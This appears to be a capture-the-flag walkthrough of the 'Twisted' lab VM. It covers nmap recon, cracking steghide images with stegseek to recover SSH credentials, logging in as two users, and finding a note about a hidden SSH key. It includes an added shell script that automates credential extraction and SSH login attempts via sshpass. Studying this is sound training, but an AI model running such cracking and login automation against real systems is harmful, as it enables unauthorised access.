Twisted
Notes
[Linux VM] [Tested on VirtualBox] created by || sml
⏲️ Release Date // 2020-10-15
✔️ MD5 // 421465f7ccfc34907fd8b7fa38f46dbc
☠ Root // 181
💀 User // 184
📝Notes // An easy one. Tested on Vbox.
Booting the target
Target IP:
192.168.56.104
nmap information gathering
Nmap scan report for 192.168.56.104
Host is up (0.00034s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
2222/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6763a0c98b7af342ac49aba6a73ffcee (RSA)
| 256 8cce8747f8b81a1a78e5b7ce74d7f5db (ECDSA)
|_ 256 9294660b92d3cf7effe8bf3c7b41b75a (ED25519)
MAC Address: 08:00:27:57:30:56 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Web service
┌─[randark@randark-Parrot]─[~/tmp/HackMyVM-Twisted]
└──╼ $http get 192.168.56.104
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html
Date: Fri, 22 Dec 2023 13:50:21 GMT
ETag: W/"5f86a150-e6"
Last-Modified: Wed, 14 Oct 2020 06:57:20 GMT
Server: nginx/1.14.2
Transfer-Encoding: chunked
<h1>I love cats!</h1>
<img src="cat-original.jpg" alt="Cat original" width="400" height="400">
<br>
<h1>But I prefer this one because seems different</h1>
<img src="cat-hidden.jpg" alt="Cat Hidden" width="400" height="400">
Download both jpg files and analyse them
┌─[randark@randark-Parrot]─[~/tmp/HackMyVM-Twisted]
└──╼ $wget http://192.168.56.104/cat-original.jpg
--2023-12-22 21:53:06-- http://192.168.56.104/cat-original.jpg
Connecting to 192.168.56.104:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 288693 (282K) [image/jpeg]
Saving to: 'cat-original.jpg'
cat-original.jpg 100%[==========================================================>] 281.93K --.-KB/s in 0.002s
2023-12-22 21:53:06 (162 MB/s) - 'cat-original.jpg' saved [288693/288693]
┌─[randark@randark-Parrot]─[~/tmp/HackMyVM-Twisted]
└──╼ $wget http://192.168.56.104/cat-hidden.jpg
--2023-12-22 21:53:12-- http://192.168.56.104/cat-hidden.jpg
Connecting to 192.168.56.104:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 288706 (282K) [image/jpeg]
Saving to: 'cat-hidden.jpg'
cat-hidden.jpg 100%[==========================================================>] 281.94K --.-KB/s in 0.002s
2023-12-22 21:53:12 (127 MB/s) - 'cat-hidden.jpg' saved [288706/288706]
stegseek steganography
stegseek on cat-original.jpg
┌─[randark@randark-Parrot]─[~/tmp/HackMyVM-Twisted]
└──╼ $stegseek cat-original.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "westlife"
[i] Original filename: "markus.txt".
[i] Extracting to "cat-original.jpg.out".
stegseek on cat-hidden.jpg
┌─[randark@randark-Parrot]─[~/tmp/HackMyVM-Twisted]
└──╼ $stegseek cat-hidden.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "sexymama"
[i] Original filename: "mateo.txt".
[i] Extracting to "cat-hidden.jpg.out".
Read the extracted data
cat-original.jpg.out
markuslovesbonita
cat-hidden.jpg.out
thisismypassword
Trying the extracted data
Since only a web service and an SSH service are exposed, the data extracted from the images is most likely SSH credentials. The original filenames stegseek reported (markus.txt and mateo.txt) give the usernames, and the file contents give the passwords, so try them against SSH on port 2222.
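The loop above (run stegseek on each image, turn the embedded filename into a username and the extracted text into a password, then try the pair over SSH) is easy to script. The following is an added example, not part of the original write-up or of stegseek; it assumes the stegseek 0.6 report format shown above, that the extracted file contains a bare password, the ".out" suffix stegseek uses, and that sshpass is installed for the login attempt. The host, port and wordlist paths are those of this target.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): automate
# "stegseek every jpg -> username:password -> try SSH".
# Assumptions: stegseek 0.6 report lines as in the write-up, the hidden
# file holds only a password, and sshpass is available.

# Username = original filename reported by stegseek, extension stripped
# ("markus.txt" -> "markus"). $1 is stegseek's captured output.
user_from_report() {
    printf '%s\n' "$1" \
        | sed -n 's/^\[i] Original filename: "\([^"]*\)".*$/\1/p' \
        | sed 's/\.[^.]*$//'
}

# The steghide passphrase stegseek cracked (worth noting, but it is the
# steganography key, not the SSH password).
passphrase_from_report() {
    printf '%s\n' "$1" | sed -n 's/^\[i] Found passphrase: "\([^"]*\)".*$/\1/p'
}

# Build user:password from the username and the extracted file contents,
# trimming CR/LF and trailing whitespace that hidden text files carry.
credential() {
    user="$1"
    pass=$(printf '%s' "$2" | tr -d '\r' | sed 's/[[:space:]]*$//')
    printf '%s:%s\n' "$user" "$pass"
}

# Full loop; only does anything when the real tools are installed.
# usage: harvest_and_try HOST PORT WORDLIST IMAGE...
harvest_and_try() {
    host="$1"; port="$2"; wordlist="$3"; shift 3
    command -v stegseek >/dev/null 2>&1 || { echo "stegseek not installed" >&2; return 2; }
    for img in "$@"; do
        # stegseek writes "<img>.out" on success and returns non-zero otherwise
        report=$(stegseek "$img" "$wordlist" 2>&1) || continue
        user=$(user_from_report "$report")
        [ -n "$user" ] || continue
        cred=$(credential "$user" "$(cat "$img.out")")
        echo "candidate: $cred (steghide passphrase: $(passphrase_from_report "$report"))"
        if command -v sshpass >/dev/null 2>&1; then
            sshpass -p "${cred#*:}" ssh -o StrictHostKeyChecking=no -o ConnectTimeout=5 \
                -p "$port" "${cred%%:*}@$host" id && echo "LOGIN OK: ${cred%%:*}"
        fi
    done
}

# On this target:
# harvest_and_try 192.168.56.104 2222 /usr/share/wordlists/rockyou.txt cat-original.jpg cat-hidden.jpg
```

The parsing functions work on a captured report, so they can be checked without the target; the SSH step is skipped silently when sshpass is absent, so a missing tool never masquerades as a failed login.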
mateo:thisismypassword
SSH mateo
┌─[✗]─[randark@randark-Parrot]─[~/tmp/HackMyVM-Twisted]
└──╼ $ssh mateo@192.168.56.104 -p 2222
mateo@192.168.56.104's password:
Linux twisted 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Oct 14 03:21:44 2020 from 192.168.1.58
mateo@twisted:~$ whoami
mateo
markus:markuslovesbonita
SSH markus
┌─[randark@randark-Parrot]─[~/tmp/HackMyVM-Twisted]
└──╼ $ssh markus@192.168.56.104 -p 2222
markus@192.168.56.104's password:
Linux twisted 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
markus@twisted:~$ whoami
markus
markus
There is a hint in the home directory
/home/markus/note.txt
Hi bonita,
I have saved your id_rsa here: /var/cache/apt/id_rsa
Nobody can find it.